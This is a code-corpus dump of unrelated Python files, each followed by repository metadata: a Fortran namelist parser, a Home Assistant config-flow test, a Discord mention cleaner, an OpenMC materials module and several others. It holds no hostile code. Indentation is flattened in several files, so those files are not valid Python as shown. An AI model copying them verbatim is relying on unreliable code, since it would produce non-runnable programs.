varname = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
valueInt = re.compile(r'[+-]?[0-9]+')
valueReal = re.compile(r'[+-]?([0-9]+\.[0-9]*|[0-9]*\.[0-9]+)')
valueNumber = re.compile(r'\b(([\+\-]?[0-9]+)?\.)?[0-9]*([eE][-+]?[0-9]+)?')
valueBool = re.compile(r"(\.(true|false|t|f)\.)",re.I)
valueTrue = re.compile(r"(\.(true|t)\.)",re.I)
spaces = r'[\s\t]*'
quote = re.compile(r"[\s\t]*[\'\"]")
namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
paramname = re.compile(r"[\s\t]*(" + varname+r')[\s\t]*=[\s\t]*')
namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")
#split sections/namelists
mynmlfile = {}
mynmlfileRaw = {}
mynmlname = ''
for item in FortranNamelistIO.clean(data.split("\n"),cleancomma=1):
if re.match(namelistname,item):
mynmlname = re.sub(namelistname,r"\1",item)
mynmlfile[mynmlname] = {}
mynmlfileRaw[mynmlname] = []
elif re.match(namlistend,item):
mynmlname = ''
else:
if mynmlname:
mynmlfileRaw[mynmlname].append(item)
#parse param in each section/namelist
for mynmlname in mynmlfile.keys():
#split strings
bb = []
for item in mynmlfileRaw[mynmlname]:
if item[0]!='!':
# discarding lines that starts with a comment
bb.extend(FortranNamelistIO.splitstring(item))
#split comma and =
aa = []
for item in bb:
if not re.match(quote,item):
aa.extend(re.sub(r"[\s\t]*=",r" =\n",re.sub(r",+",r"\n",item)).split("\n"))
# aa.extend(re.sub(r"[\s\t]*=",r" =\n",item).split("\n"))
else:
aa.append(item)
del(bb)
aa = FortranNamelistIO.clean(aa,cleancomma=1)
myparname = ''
id_cum=0
for item in aa:
if re.search(paramname,item):
#myparname = re.sub(paramname,r"\1",item).lower() ! NO MORE LOWER CASE
myparname = re.sub(paramname,r"\1",item)
id_cum=id_cum+1
mynmlfile[mynmlname][myparname] = {
'val' : [],
'id' : id_cum,
'com' : ''
}
elif paramname:
# Storing comments
item2=item.split('!')
item=item2[0]
if len(item) > 1 :
mynmlfile[mynmlname][myparname]['com']=''.join(item2[1:])
if re.match(valueBool,item):
if re.match(valueTrue,item):
mynmlfile[mynmlname][myparname]['val'].append('.true.')
else:
mynmlfile[mynmlname][myparname]['val'].append('.false.')
else:
# item2=re.sub(r"(^[\'\"]|[\'\"]$)",r"",item.strip())
mynmlfile[mynmlname][myparname]['val'].append(item.strip())
self.data=mynmlfile
# Accessor and mutator dictionary style
def __getitem__(self, key):
""" Transform the class instance into a dictionary."""
return self.data[key]
def __setitem__(self, key, value):
""" Transform the class instance into a dictionary."""
self.data[key] = value
#==== Helper functions for Parsing of files
@staticmethod
def clean(mystringlist,commentexpr=r"^[\s\t]*\#.*$",spacemerge=0,cleancomma=0):
"""
Remove leading and trailing blanks, comments/empty lines from a list of strings
mystringlist = foo.clean(mystringlist,spacemerge=0,commentline=r"^[\s\t]*\#",cleancharlist="")
commentline: definition of commentline
spacemerge: if <>0, merge/collapse multi space
cleancomma: Remove leading and trailing commas
"""
aa = mystringlist
if cleancomma:
aa = [re.sub("(^([\s\t]*\,)+)|((\,[\s\t]*)+$)","",item).strip() for item in aa]
if commentexpr:
aa = [re.sub(commentexpr,"",item).strip() for item in aa]
        if spacemerge:
            aa = [re.sub("[\s\t]+"," ",item).strip() for item in aa if len(item.strip()) != 0]
        else:
            aa = [item.strip() for item in aa if len(item.strip()) != 0]
return aa
@staticmethod
def splitstring(mystr):
"""
Split a string in a list of strings at quote boundaries
Input: String
Output: list of strings
"""
dquote=r'(^[^\"\']*)(\"[^"]*\")(.*)$'
squote=r"(^[^\"\']*)(\'[^']*\')(.*$)"
mystrarr = re.sub(dquote,r"\1\n\2\n\3",re.sub(squote,r"\1\n\2\n\3",mystr)).split("\n")
#remove zerolenght items
        mystrarr = [item for item in mystrarr if len(item) != 0]
if len(mystrarr) > 1:
mystrarr2 = []
for item in mystrarr:
mystrarr2.extend(FortranNamelistIO.splitstring(item))
mystrarr = mystrarr2
return mystrarr
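# Illustrative sketch (added comment, not part of the original module): the two
# static helpers above can be exercised on their own; the expected results below
# follow from the regular expressions defined in this class.
#
#   FortranNamelistIO.splitstring("title = 'omnivor run' nrev = 3")
#   # -> ["title = ", "'omnivor run'", " nrev = 3"]
#   FortranNamelistIO.clean(['  nrev = 3 ,, ', '', '# a comment'], cleancomma=1)
#   # -> ['nrev = 3']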
## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
""" Test class for MyFileType class """
test_file = './test/fortran/fortran_namelist.nml'
def test_output_identical(self):
InputFile=FortranNamelistIO(self.test_file)
test_fileout=tempfile.mkstemp()[1]
InputFile.write(test_fileout)
with open(self.test_file, 'r') as f:
data_expected = f.read()
with open(test_fileout, 'r') as f:
data_read = f.read()
try:
self.assertMultiLineEqual(data_read, data_expected)
finally:
os.remove(test_fileout)
def test_duplication(self):
self._test_duplication(FortranNamelistIO, self.test_file)
## Main function ---------------------------------------------------------
if __name__ == '__main__':
""" This is the main fuction that will run the tests automatically
"""
unittest.main()
|
DTUWindEnergy/Python4WindEnergy
|
py4we/fortran_namelist_io.py
|
Python
|
apache-2.0
| 8,294
| 0.01278
|
"""Test the National Weather Service (NWS) config flow."""
from unittest.mock import patch
import aiohttp
from homeassistant import config_entries
from homeassistant.components.nws.const import DOMAIN
async def test_form(hass, mock_simple_nws_config):
"""Test we get the form."""
hass.config.latitude = 35
hass.config.longitude = -90
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"], {"api_key": "test"}
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "ABC"
assert result2["data"] == {
"api_key": "test",
"latitude": 35,
"longitude": -90,
"station": "ABC",
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass, mock_simple_nws_config):
"""Test we handle cannot connect error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = aiohttp.ClientError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_unknown_error(hass, mock_simple_nws_config):
"""Test we handle unknown error."""
mock_instance = mock_simple_nws_config.return_value
mock_instance.set_station.side_effect = ValueError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_form_already_configured(hass, mock_simple_nws_config):
"""Test we handle duplicate entries."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert len(mock_setup_entry.mock_calls) == 1
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.nws.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"api_key": "test"},
)
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
await hass.async_block_till_done()
assert len(mock_setup_entry.mock_calls) == 0
|
jawilson/home-assistant
|
tests/components/nws/test_config_flow.py
|
Python
|
apache-2.0
| 3,482
| 0
|
def f(x=2):
return x
lis = [1]
dic = {
"x": 2
}
f(1) # call_function
f(*lis) # call_function_var
f(**dic) # call_function_kw
f(*[], **dic) # call_function_var_kw
class C(object): # call_function
def __enter__(self):
x = 1
return x
def __exit__(self, *args, **kwargs):
pass
def fn_dec(*args):
def dec(fn):
return fn
return dec
dec1 = fn_dec("1")
@fn_dec("2") # call_function
@dec1 # call_function
def fw(x):
return x
@fn_dec("2") # call_function
@dec1 # call_function
class D(object):
pass
[a for a in lis] # nothing
{a for a in lis} # call_function
{a: a for a in lis} # call_function
f(a for a in lis) # call_function gen, call_function
with C() as r: # WITH_CLEANUP
pass
assert True # nothing
assert True, "wat" # call_function
|
gems-uff/noworkflow
|
tests/test_disasm.py
|
Python
|
mit
| 831
| 0.002407
|
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/getAccuracy.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def getAccuracy(y: Matrix,
yhat: Matrix,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
params_dict = {'y': y, 'yhat': yhat}
params_dict.update(kwargs)
return Matrix(y.sds_context,
'getAccuracy',
named_input_nodes=params_dict)
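# Usage sketch (illustration only, not part of the autogenerated file; the
# SystemDSContext/from_numpy/compute calls below are assumed to be available in
# the surrounding SystemDS Python API):
#
#   import numpy as np
#   from systemds.context import SystemDSContext
#   with SystemDSContext() as sds:
#       y = sds.from_numpy(np.array([[1.0], [2.0], [1.0]]))
#       y_hat = sds.from_numpy(np.array([[1.0], [2.0], [2.0]]))
#       acc = getAccuracy(y, y_hat).compute()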
|
apache/incubator-systemml
|
src/main/python/systemds/operator/algorithm/builtin/getAccuracy.py
|
Python
|
apache-2.0
| 1,549
| 0.002582
|
"""Provides some useful utilities for the Discord bot, mostly to do with cleaning."""
import re
import discord
__all__ = ['clean', 'is_clean']
mass_mention = re.compile('@(everyone|here)')
member_mention = re.compile(r'<@\!?(\d+)>')
role_mention = re.compile(r'<@&(\d+)>')
channel_mention = re.compile(r'<#(\d+)>')
def clean(ctx, text=None, *, mass=True, member=True, role=True, channel=True):
"""Cleans the message of anything specified in the parameters passed."""
    if text is None:
        text = ctx.message.content
    cleaned_text = text  # start from the raw text so later substitutions work even when mass=False
    if mass:
        cleaned_text = mass_mention.sub(lambda match: '@\N{ZERO WIDTH SPACE}' + match.group(1), cleaned_text)
if member:
cleaned_text = member_mention.sub(lambda match: clean_member_name(ctx, int(match.group(1))), cleaned_text)
if role:
cleaned_text = role_mention.sub(lambda match: clean_role_name(ctx, int(match.group(1))), cleaned_text)
if channel:
cleaned_text = channel_mention.sub(lambda match: clean_channel_name(ctx, int(match.group(1))), cleaned_text)
return cleaned_text
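# Example (added comment, illustration only): with only mass-mention cleaning
# enabled the context object is never consulted, so None can stand in for ctx:
#   clean(None, '@everyone hello', member=False, role=False, channel=False)
#   # -> '@\N{ZERO WIDTH SPACE}everyone hello'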
def is_clean(ctx, text=None):
"""Checks if the message is clean already and doesn't need to be cleaned."""
if text is None:
text = ctx.message.content
return all(regex.search(text) is None for regex in (mass_mention, member_mention, role_mention, channel_mention))
def clean_member_name(ctx, member_id):
"""Cleans a member's name from the message."""
member = ctx.guild.get_member(member_id)
if member is None:
return '<@\N{ZERO WIDTH SPACE}%d>' % member_id
elif is_clean(ctx, member.display_name):
return member.display_name
elif is_clean(ctx, str(member)):
return str(member)
else:
return '<@\N{ZERO WIDTH SPACE}%d>' % member.id
def clean_role_name(ctx, role_id):
"""Cleans role pings from messages."""
role = discord.utils.get(ctx.guild.roles, id=role_id) # Guild.get_role doesn't exist
if role is None:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role_id
elif is_clean(ctx, role.name):
return '@' + role.name
else:
return '<@&\N{ZERO WIDTH SPACE}%d>' % role.id
def clean_channel_name(ctx, channel_id):
"""Cleans channel mentions from messages."""
channel = ctx.guild.get_channel(channel_id)
if channel is None:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel_id
elif is_clean(ctx, channel.name):
return '#' + channel.name
else:
return '<#\N{ZERO WIDTH SPACE}%d>' % channel.id
def pretty_concat(strings, single_suffix='', multi_suffix=''):
"""Concatenates things in a pretty way"""
if len(strings) == 1:
return strings[0] + single_suffix
elif len(strings) == 2:
return '{} and {}{}'.format(*strings, multi_suffix)
else:
return '{}, and {}{}'.format(', '.join(strings[:-1]), strings[-1], multi_suffix)
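# Example behaviour of pretty_concat (added comment, illustration only):
#   pretty_concat(['a'])                        -> 'a'
#   pretty_concat(['a', 'b'], multi_suffix='!') -> 'a and b!'
#   pretty_concat(['a', 'b', 'c'])              -> 'a, b, and c'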
|
guineawheek/Dozer
|
dozer/utils.py
|
Python
|
gpl-3.0
| 2,868
| 0.003138
|
from lib.base import BaseJiraAction
__all__ = [
'TransitionJiraIssueAction'
]
class TransitionJiraIssueAction(BaseJiraAction):
def run(self, issue_key, transition):
result = self._client.transition_issue(issue_key, transition)
return result
|
armab/st2contrib
|
packs/jira/actions/transition_issue.py
|
Python
|
apache-2.0
| 269
| 0
|
## Need to find a library
|
jacksarick/My-Code
|
Python/python challenges/euler/017_number_letter_counts.py
|
Python
|
mit
| 25
| 0.08
|
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Copyright (c) 2014, Raphael Kubo da Costa <rakuco@FreeBSD.org>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
import PyQt4.QtCore
import os
import sys
def get_default_sip_dir():
# This is based on QScintilla's configure.py, and only works for the
# default case where installation paths have not been changed in PyQt's
# configuration process.
if sys.platform == 'win32':
pyqt_sip_dir = os.path.join(sys.prefix, 'sip', 'PyQt4')
else:
pyqt_sip_dir = os.path.join(sys.prefix, 'share', 'sip', 'PyQt4')
return pyqt_sip_dir
def get_qt4_tag(sip_flags):
in_t = False
for item in sip_flags.split(' '):
if item == '-t':
in_t = True
elif in_t:
if item.startswith('Qt_4'):
return item
else:
in_t = False
raise ValueError('Cannot find Qt\'s tag in PyQt4\'s SIP flags.')
if __name__ == '__main__':
try:
import PyQt4.pyqtconfig
pyqtcfg = PyQt4.pyqtconfig.Configuration()
sip_dir = pyqtcfg.pyqt_sip_dir
sip_flags = pyqtcfg.pyqt_sip_flags
except ImportError:
# PyQt4 >= 4.10.0 was built with configure-ng.py instead of
# configure.py, so pyqtconfig.py is not installed.
sip_dir = get_default_sip_dir()
sip_flags = PyQt4.QtCore.PYQT_CONFIGURATION['sip_flags']
print('pyqt_version:%06.x' % PyQt4.QtCore.PYQT_VERSION)
print('pyqt_version_str:%s' % PyQt4.QtCore.PYQT_VERSION_STR)
print('pyqt_version_tag:%s' % get_qt4_tag(sip_flags))
print('pyqt_sip_dir:%s' % sip_dir)
print('pyqt_sip_flags:%s' % sip_flags)
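# Expected output shape (added comment; the values below are illustrative only,
# not taken from a real installation). One "key:value" pair is printed per line,
# presumably consumed by the companion FindPyQt CMake module:
#   pyqt_version:040b01
#   pyqt_version_str:4.11.1
#   pyqt_version_tag:Qt_4_8_6
#   pyqt_sip_dir:/usr/share/sip/PyQt4
#   pyqt_sip_flags:-x VendorID -t WS_X11 -t Qt_4_8_6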
|
melvyn-sopacua/kdelibs
|
cmake/modules/FindPyQt.py
|
Python
|
gpl-2.0
| 1,768
| 0.001697
|
from collections import Iterable
from copy import deepcopy
from numbers import Real, Integral
import warnings
from xml.etree import ElementTree as ET
import sys
if sys.version_info[0] >= 3:
basestring = str
import openmc
from openmc.checkvalue import check_type, check_value, check_greater_than
from openmc.clean_xml import *
# A list of all IDs for all Materials created
MATERIAL_IDS = []
# A static variable for auto-generated Material IDs
AUTO_MATERIAL_ID = 10000
def reset_auto_material_id():
global AUTO_MATERIAL_ID, MATERIAL_IDS
AUTO_MATERIAL_ID = 10000
MATERIAL_IDS = []
# Units for density supported by OpenMC
DENSITY_UNITS = ['g/cm3', 'g/cc', 'kg/cm3', 'at/b-cm', 'at/cm3', 'sum']
# Constant for density when not needed
NO_DENSITY = 99999.
class Material(object):
"""A material composed of a collection of nuclides/elements that can be assigned
to a region of space.
Parameters
----------
material_id : int, optional
Unique identifier for the material. If not specified, an identifier will
automatically be assigned.
name : str, optional
Name of the material. If not specified, the name will be the empty
string.
Attributes
----------
id : int
Unique identifier for the material
density : float
Density of the material (units defined separately)
    density_units : str
        Units used for `density`. Can be one of 'g/cm3', 'g/cc', 'kg/cm3',
        'at/b-cm', 'at/cm3', or 'sum'.
"""
def __init__(self, material_id=None, name=''):
# Initialize class attributes
self.id = material_id
self.name = name
self._density = None
self._density_units = ''
# A dictionary of Nuclides
# Keys - Nuclide names
# Values - tuple (nuclide, percent, percent type)
self._nuclides = {}
# A dictionary of Elements
# Keys - Element names
# Values - tuple (element, percent, percent type)
self._elements = {}
# If specified, a list of tuples of (table name, xs identifier)
self._sab = []
# If true, the material will be initialized as distributed
self._convert_to_distrib_comps = False
# If specified, this file will be used instead of composition values
self._distrib_otf_file = None
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def density(self):
return self._density
@property
def density_units(self):
return self._density_units
@property
def convert_to_distrib_comps(self):
return self._convert_to_distrib_comps
@property
def distrib_otf_file(self):
return self._distrib_otf_file
@id.setter
def id(self, material_id):
global AUTO_MATERIAL_ID, MATERIAL_IDS
# If the Material already has an ID, remove it from global list
if hasattr(self, '_id') and self._id is not None:
MATERIAL_IDS.remove(self._id)
if material_id is None:
self._id = AUTO_MATERIAL_ID
MATERIAL_IDS.append(AUTO_MATERIAL_ID)
AUTO_MATERIAL_ID += 1
else:
check_type('material ID', material_id, Integral)
if material_id in MATERIAL_IDS:
msg = 'Unable to set Material ID to {0} since a Material with ' \
'this ID was already initialized'.format(material_id)
raise ValueError(msg)
check_greater_than('material ID', material_id, 0)
self._id = material_id
MATERIAL_IDS.append(material_id)
@name.setter
def name(self, name):
check_type('name for Material ID={0}'.format(self._id),
name, basestring)
self._name = name
def set_density(self, units, density=NO_DENSITY):
"""Set the density of the material
Parameters
----------
units : str
Physical units of density
density : float, optional
Value of the density. Must be specified unless units is given as
'sum'.
"""
check_type('the density for Material ID={0}'.format(self._id),
density, Real)
check_value('density units', units, DENSITY_UNITS)
        if density == NO_DENSITY and units != 'sum':
msg = 'Unable to set the density Material ID={0} ' \
'because a density must be set when not using ' \
'sum unit'.format(self._id)
raise ValueError(msg)
self._density = density
self._density_units = units
@distrib_otf_file.setter
def distrib_otf_file(self, filename):
# TODO: remove this when distributed materials are merged
warnings.warn('This feature is not yet implemented in a release '
'version of openmc')
if not isinstance(filename, basestring) and filename is not None:
msg = 'Unable to add OTF material file to Material ID={0} with a ' \
'non-string name {1}'.format(self._id, filename)
raise ValueError(msg)
self._distrib_otf_file = filename
    @convert_to_distrib_comps.setter
    def convert_to_distrib_comps(self, convert):
        # TODO: remove this when distributed materials are merged
        warnings.warn('This feature is not yet implemented in a release '
                      'version of openmc')
        self._convert_to_distrib_comps = convert
def add_nuclide(self, nuclide, percent, percent_type='ao'):
"""Add a nuclide to the material
Parameters
----------
nuclide : str or openmc.nuclide.Nuclide
Nuclide to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(nuclide, (openmc.Nuclide, str)):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-Nuclide value {1}'.format(self._id, nuclide)
raise ValueError(msg)
elif not isinstance(percent, Real):
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
elif percent_type not in ['ao', 'wo', 'at/g-cm']:
msg = 'Unable to add a Nuclide to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
if isinstance(nuclide, openmc.Nuclide):
# Copy this Nuclide to separate it from the Nuclide in
# other Materials
nuclide = deepcopy(nuclide)
else:
nuclide = openmc.Nuclide(nuclide)
self._nuclides[nuclide._name] = (nuclide, percent, percent_type)
def remove_nuclide(self, nuclide):
"""Remove a nuclide from the material
Parameters
----------
nuclide : openmc.nuclide.Nuclide
Nuclide to remove
"""
if not isinstance(nuclide, openmc.Nuclide):
msg = 'Unable to remove a Nuclide {0} in Material ID={1} ' \
'since it is not a Nuclide'.format(self._id, nuclide)
raise ValueError(msg)
# If the Material contains the Nuclide, delete it
if nuclide._name in self._nuclides:
del self._nuclides[nuclide._name]
def add_element(self, element, percent, percent_type='ao'):
"""Add a natural element to the material
Parameters
----------
element : openmc.element.Element
Element to add
percent : float
Atom or weight percent
percent_type : str
'ao' for atom percent and 'wo' for weight percent
"""
if not isinstance(element, openmc.Element):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-Element value {1}'.format(self._id, element)
raise ValueError(msg)
if not isinstance(percent, Real):
msg = 'Unable to add an Element to Material ID={0} with a ' \
'non-floating point value {1}'.format(self._id, percent)
raise ValueError(msg)
if percent_type not in ['ao', 'wo']:
msg = 'Unable to add an Element to Material ID={0} with a ' \
'percent type {1}'.format(self._id, percent_type)
raise ValueError(msg)
# Copy this Element to separate it from same Element in other Materials
element = deepcopy(element)
self._elements[element._name] = (element, percent, percent_type)
def remove_element(self, element):
"""Remove a natural element from the material
Parameters
----------
element : openmc.element.Element
Element to remove
"""
# If the Material contains the Element, delete it
if element._name in self._elements:
del self._elements[element._name]
def add_s_alpha_beta(self, name, xs):
r"""Add an :math:`S(\alpha,\beta)` table to the material
Parameters
----------
name : str
Name of the :math:`S(\alpha,\beta)` table
xs : str
Cross section identifier, e.g. '71t'
"""
if not isinstance(name, basestring):
msg = 'Unable to add an S(a,b) table to Material ID={0} with a ' \
'non-string table name {1}'.format(self._id, name)
raise ValueError(msg)
if not isinstance(xs, basestring):
msg = 'Unable to add an S(a,b) table to Material ID={0} with a ' \
'non-string cross-section identifier {1}'.format(self._id, xs)
raise ValueError(msg)
self._sab.append((name, xs))
def get_all_nuclides(self):
"""Returns all nuclides in the material
Returns
-------
nuclides : dict
Dictionary whose keys are nuclide names and values are 2-tuples of
(nuclide, density)
"""
nuclides = {}
for nuclide_name, nuclide_tuple in self._nuclides.items():
nuclide = nuclide_tuple[0]
density = nuclide_tuple[1]
nuclides[nuclide._name] = (nuclide, density)
return nuclides
    def __repr__(self):
string = 'Material\n'
string += '{0: <16}{1}{2}\n'.format('\tID', '=\t', self._id)
string += '{0: <16}{1}{2}\n'.format('\tName', '=\t', self._name)
string += '{0: <16}{1}{2}'.format('\tDensity', '=\t', self._density)
string += ' [{0}]\n'.format(self._density_units)
string += '{0: <16}\n'.format('\tS(a,b) Tables')
for sab in self._sab:
string += '{0: <16}{1}[{2}{3}]\n'.format('\tS(a,b)', '=\t',
sab[0], sab[1])
string += '{0: <16}\n'.format('\tNuclides')
for nuclide in self._nuclides:
percent = self._nuclides[nuclide][1]
percent_type = self._nuclides[nuclide][2]
string += '{0: <16}'.format('\t{0}'.format(nuclide))
string += '=\t{0: <12} [{1}]\n'.format(percent, percent_type)
string += '{0: <16}\n'.format('\tElements')
for element in self._elements:
            percent = self._elements[element][1]
            percent_type = self._elements[element][2]
string += '{0: >16}'.format('\t{0}'.format(element))
string += '=\t{0: <12} [{1}]\n'.format(percent, percent_type)
return string
def _get_nuclide_xml(self, nuclide, distrib=False):
xml_element = ET.Element("nuclide")
xml_element.set("name", nuclide[0]._name)
if not distrib:
            if nuclide[2] == 'ao':
xml_element.set("ao", str(nuclide[1]))
else:
xml_element.set("wo", str(nuclide[1]))
if nuclide[0]._xs is not None:
xml_element.set("xs", nuclide[0]._xs)
return xml_element
def _get_element_xml(self, element, distrib=False):
xml_element = ET.Element("element")
xml_element.set("name", str(element[0]._name))
if not distrib:
            if element[2] == 'ao':
xml_element.set("ao", str(element[1]))
else:
xml_element.set("wo", str(element[1]))
return xml_element
def _get_nuclides_xml(self, nuclides, distrib=False):
xml_elements = []
for nuclide in nuclides.values():
xml_elements.append(self._get_nuclide_xml(nuclide, distrib))
return xml_elements
def _get_elements_xml(self, elements, distrib=False):
xml_elements = []
for element in elements.values():
xml_elements.append(self._get_element_xml(element, distrib))
return xml_elements
def get_material_xml(self):
"""Return XML representation of the material
Returns
-------
element : xml.etree.ElementTree.Element
XML element containing material data
"""
# Create Material XML element
element = ET.Element("material")
element.set("id", str(self._id))
if len(self._name) > 0:
element.set("name", str(self._name))
# Create density XML subelement
subelement = ET.SubElement(element, "density")
        if self._density_units != 'sum':
subelement.set("value", str(self._density))
subelement.set("units", self._density_units)
if not self._convert_to_distrib_comps:
# Create nuclide XML subelements
subelements = self._get_nuclides_xml(self._nuclides)
for subelement in subelements:
element.append(subelement)
# Create element XML subelements
subelements = self._get_elements_xml(self._elements)
for subelement in subelements:
element.append(subelement)
else:
subelement = ET.SubElement(element, "compositions")
comps = []
            allnucs = list(self._nuclides.values()) + list(self._elements.values())
dist_per_type = allnucs[0][2]
for nuc, per, typ in allnucs:
if not typ == dist_per_type:
msg = 'All nuclides and elements in a distributed ' \
'material must have the same type, either ao or wo'
raise ValueError(msg)
comps.append(per)
if self._distrib_otf_file is None:
# Create values and units subelements
subsubelement = ET.SubElement(subelement, "values")
subsubelement.text = ' '.join([str(c) for c in comps])
subsubelement = ET.SubElement(subelement, "units")
subsubelement.text = dist_per_type
else:
# Specify the materials file
subsubelement = ET.SubElement(subelement, "otf_file_path")
subsubelement.text = self._distrib_otf_file
# Create nuclide XML subelements
            subelements = self._get_nuclides_xml(self._nuclides, distrib=True)
for subelement_nuc in subelements:
subelement.append(subelement_nuc)
# Create element XML subelements
subelements = self._get_elements_xml(self._elements, distrib=True)
for subelement_ele in subelements:
subelement.append(subelement_ele)
if len(self._sab) > 0:
for sab in self._sab:
subelement = ET.SubElement(element, "sab")
subelement.set("name", sab[0])
subelement.set("xs", sab[1])
return element
class MaterialsFile(object):
"""Materials file used for an OpenMC simulation. Corresponds directly to the
materials.xml input file.
Attributes
----------
default_xs : str
The default cross section identifier applied to a nuclide when none is
specified
"""
def __init__(self):
# Initialize MaterialsFile class attributes
self._materials = []
self._default_xs = None
self._materials_file = ET.Element("materials")
@property
def default_xs(self):
return self._default_xs
@default_xs.setter
def default_xs(self, xs):
check_type('default xs', xs, basestring)
self._default_xs = xs
def add_material(self, material):
"""Add a material to the file.
Parameters
----------
material : Material
Material to add
"""
if not isinstance(material, Material):
msg = 'Unable to add a non-Material {0} to the ' \
'MaterialsFile'.format(material)
raise ValueError(msg)
self._materials.append(material)
def add_materials(self, materials):
"""Add multiple materials to the file.
Parameters
----------
materials : tuple or list of Material
Materials to add
"""
if not isinstance(materials, Iterable):
msg = 'Unable to create OpenMC materials.xml file from {0} which ' \
'is not iterable'.format(materials)
raise ValueError(msg)
for material in materials:
self.add_material(material)
def remove_material(self, material):
"""Remove a material from the file
Parameters
----------
material : Material
Material to remove
"""
if not isinstance(material, Material):
msg = 'Unable to remove a non-Material {0} from the ' \
'MaterialsFile'.format(material)
raise ValueError(msg)
self._materials.remove(material)
def _create_material_subelements(self):
subelement = ET.SubElement(self._materials_file, "default_xs")
if self._default_xs is not None:
subelement.text = self._default_xs
for material in self._materials:
xml_element = material.get_material_xml()
self._materials_file.append(xml_element)
def export_to_xml(self):
"""Create a materials.xml file that can be used for a simulation.
"""
self._create_material_subelements()
# Clean the indentation in the file to be user-readable
sort_xml_elements(self._materials_file)
clean_xml_indentation(self._materials_file)
# Write the XML Tree to the materials.xml file
tree = ET.ElementTree(self._materials_file)
tree.write("materials.xml", xml_declaration=True,
encoding='utf-8', method="xml")
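# Usage sketch (added comment, illustration only; the nuclide names, density and
# S(a,b) identifiers below are made up, and the openmc import is assumed to
# provide this older API):
#
#   import openmc
#   fuel = Material(name='UO2 fuel')
#   fuel.set_density('g/cm3', 10.3)
#   fuel.add_nuclide(openmc.Nuclide('U-235'), 0.05)
#   fuel.add_nuclide(openmc.Nuclide('U-238'), 0.95)
#   fuel.add_s_alpha_beta('lwtr', '15t')
#   materials_file = MaterialsFile()
#   materials_file.add_material(fuel)
#   materials_file.export_to_xml()   # writes materials.xml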
|
lilulu/openmc
|
openmc/material.py
|
Python
|
mit
| 18,937
| 0.000422
|
# Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
from mcrouter.test.MCProcess import Memcached
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestDevNull(McrouterTestCase):
config = './mcrouter/test/test_dev_null.json'
extra_args = []
def setUp(self):
        # The order here must correspond to the order of hosts in the .json
self.mc_good = self.add_server(Memcached())
self.mc_wild = self.add_server(Memcached())
def get_mcrouter(self):
return self.add_mcrouter(self.config, extra_args=self.extra_args)
def test_dev_null(self):
mcr = self.get_mcrouter()
# finally setup is done
mcr.set("good:key", "should_be_set")
mcr.set("key", "should_be_set_wild")
mcr.set("null:key", "should_not_be_set")
mcgood_val = self.mc_good.get("good:key")
mcnull_val = self.mc_wild.get("null:key")
mcwild_val = self.mc_wild.get("key")
self.assertEqual(mcgood_val, "should_be_set")
